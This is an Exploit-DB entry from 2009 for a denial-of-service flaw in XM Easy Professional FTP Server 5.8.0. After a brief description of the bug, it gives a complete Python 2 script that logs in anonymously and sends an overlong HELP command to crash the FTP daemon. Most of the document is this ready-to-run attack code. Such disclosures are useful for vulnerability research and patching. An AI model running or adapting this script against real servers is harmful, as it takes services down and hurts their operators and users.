XM Easy Professional FTP Server 5.8.0 - Denial of Service

EDB-ID:

10257

CVE:

N/A


Type:

dos


Platform:

Windows

Date:

2009-11-30


# I discovered a denial-of-service vulnerability on XM Easy Professional
# FTP Server product.
# After successfuly logged-in, when you send "HELP AAAA...(4074 times)",
# ftp daemon crashes.

# -----------------------

# Exploit Title: XM Easy Professional FTP Server 5.8.0 Denial Of Service Vulnerability
# Date: 27.11.2009
# Author: Mert SARICA
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP SP3

# XM Easy Professional FTP Server 5.8.0
# Denial of Service Vulnerability
# Note: FTP account is required for exploitation
# http://www.mertsarica.com

from ftplib import *
import sys
import ftplib

try: 
    ftp = FTP('localhost')   # connect to host, default port
except:
    print "Connection error"
    sys.exit(1)
    
try:
    ftp.login()              # user anonymous, passwd anonymous@
except:
    print "Login failed"
    sys.exit(1)

packet = "HELP " + "MS" * 2037 # magic packet

try:
    ftp.sendcmd(packet)
    ftp.quit()
except ftplib.all_errors, error:
    print("Very good, young padawan, but you still have much to learn...")